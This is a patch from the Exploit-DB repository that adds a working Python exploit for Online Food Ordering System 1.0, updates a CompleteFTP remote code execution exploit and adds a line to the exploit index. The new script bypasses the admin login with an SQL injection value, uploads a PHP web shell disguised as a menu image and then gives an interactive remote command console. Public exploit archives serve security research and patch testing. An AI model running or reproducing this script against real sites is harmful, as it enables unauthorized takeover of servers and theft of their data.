From 00b27610c81f3d642857e4ea899730220fef58c4 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 24 Sep 2020 05:02:05 +0000
Subject: [PATCH] DB: 2020-09-24

2 changes to exploits/shellcodes

Online Food Ordering System 1.0 - Remote Code Execution
---
 exploits/php/webapps/48827.txt   | 94 ++++++++++++++++++++++++++++++++
 exploits/windows/remote/48657.py |  6 +-
 files_exploits.csv               |  1 +
 3 files changed, 98 insertions(+), 3 deletions(-)
 create mode 100644 exploits/php/webapps/48827.txt

diff --git a/exploits/php/webapps/48827.txt b/exploits/php/webapps/48827.txt
new file mode 100644
index 000000000..8bb3260b5
--- /dev/null
+++ b/exploits/php/webapps/48827.txt
@@ -0,0 +1,94 @@
+# Exploit Title: Online Food Ordering System 1.0 - Remote Code Execution
+# Google Dork: N/A
+# Date: 2020-09-22
+# Exploit Author: Eren Şimşek
+# Vendor Homepage: https://www.sourcecodester.com/php/14460/simple-online-food-ordering-system-using-phpmysql.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-food-ordering-system-using-php.zip
+# Version: 1.0
+# Tested on: Windows/Linux - XAMPP Server
+# CVE : N/A
+
+# Setup: pip3 install bs4 .
+
+# Exploit Code :
+
+
+import requests,sys,string,random
+from bs4 import BeautifulSoup
+
+def get_random_string(length):
+    letters = string.ascii_lowercase
+    result_str = ''.join(random.choice(letters) for i in range(length))
+    return result_str
+
+session = requests.session()
+Domain = ""
+RandomFileName = get_random_string(5)+".php"
+def Help():
+    print("[?] Usage: python AporlorRCE.py <Domain>")
+
+def Upload():
+    session = requests.session()
+    burp0_url = Domain+"/admin/ajax.php?action=save_menu"
+    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://localhost/fos/admin/index.php?page=menu", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------21991269520298699981411767018", "Connection": "close"}
+    burp0_data = "-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nRCE\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"description\"\r\n\r\nRCE\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"status\"\r\n\r\non\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"category_id\"\r\n\r\n3\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"price\"\r\n\r\n1\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+RandomFileName+"\"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n-----------------------------21991269520298699981411767018--\r\n"
+    try:
+        Resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
+        if Resp == "1":
+            print("[+] Shell Upload Success")
+        else:
+            print("[-] Shell Upload Failed")
+    except:
+        print("[-] Request Failed")
+        Help()
+
+def Login():
+    burp0_url = Domain+"/admin/ajax.php?action=login"
+    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://localhost/fos/admin/login.php", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
+    burp0_data = {"username": "' OR 1=1 #", "password": "' OR 1=1 #"}
+    try:
+        Resp = session.post(burp0_url, headers=burp0_headers,data=burp0_data)
+        if Resp.text == "1":
+            print("[+] Login Success")
+        else:
+            print("[+] Login Failed")
+    except:
+        print("[-] Request Failed")
+        Help()
+
+def FoundMyRCE():
+    global FileName
+    burp0_url = Domain+"/admin/index.php?page=menu"
+    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+    try:
+        Resp = session.get(burp0_url, headers=burp0_headers)
+        Soup = BeautifulSoup(Resp.text, "html5lib")
+        Data = Soup.find_all("img")
+        for MyRCE in Data:
+            if RandomFileName in MyRCE["src"]:
+                FileName = MyRCE["src"].strip("../assets/img/")
+                print("[+] Found File Name: " + MyRCE["src"].strip("../assets/img/"))
+    except:
+        print("[-] Request Failed")
+        Help()
+
+def Terminal():
+    while True:
+        Command = input("Console: ")
+        burp0_url = Domain+"/assets/img/"+FileName+"?cmd="+Command
+        try:
+            Resp = session.get(burp0_url)
+            print(Resp.text)
+        except KeyboardInterrupt:
+            print("[+] KeyboardInterrupt Stop, Thanks For Use Aporlorxl23")
+        except:
+            print("[-] Request Error")
+if __name__ == "__main__":
+    if len(sys.argv) == 2:
+        Domain = sys.argv[1]
+        Login()
+        Upload()
+        FoundMyRCE()
+        Terminal()
+    else:
+        Help()
\ No newline at end of file
diff --git a/exploits/windows/remote/48657.py b/exploits/windows/remote/48657.py
index 1509cde3f..ae9e6b47a 100755
--- a/exploits/windows/remote/48657.py
+++ b/exploits/windows/remote/48657.py
@@ -1,4 +1,4 @@
-# Exploit Title: CompleteFTP Professional 12.1.3 - Remote Code Execution
+# Exploit Title: CompleteFTP Professional < 12.1.3 - Remote Code Execution
 # Date: 2020-03-11
 # Exploit Author: 1F98D
 # Original Author: Rhino Security Labs
@@ -149,7 +149,7 @@ xml_schema = """
     </xs:unique>
   </xs:element>
 </xs:schema>
-""".replace("<", "<").replace(">", ">").replace('"', """).strip()
+""".replace("<", "&#60;").replace(">", "&#62;").replace('"', "&#34;").strip()
 # endregion
 
 # region xml_diffgram
@@ -287,7 +287,7 @@ def get_uuid(sftp):
 def login(host, port, user, password):
     ssh = paramiko.SSHClient()
     ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
-    ssh.connect(host, port, user, password, look_for_keys=False)
+    ssh.connect(host, port, user, password, look_for_keys=False, allow_agent=False)
     return ssh.open_sftp()
 
 def send_command(sftp, cmd):
diff --git a/files_exploits.csv b/files_exploits.csv
index 304bf16a4..2f73bb785 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -40651,6 +40651,7 @@ id,file,description,date,author,type,platform,port
 48824,exploits/multiple/webapps/48824.py,"B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution",2020-09-21,LiquidWorm,webapps,multiple,
 48825,exploits/multiple/webapps/48825.py,"Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution",2020-09-22,"Milad Fadavvi",webapps,multiple,
 48826,exploits/php/webapps/48826.txt,"Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting",2020-09-22,"Alperen Ergel",webapps,php,
+48827,exploits/php/webapps/48827.txt,"Online Food Ordering System 1.0 - Remote Code Execution",2020-09-23,"Eren Şimşek",webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,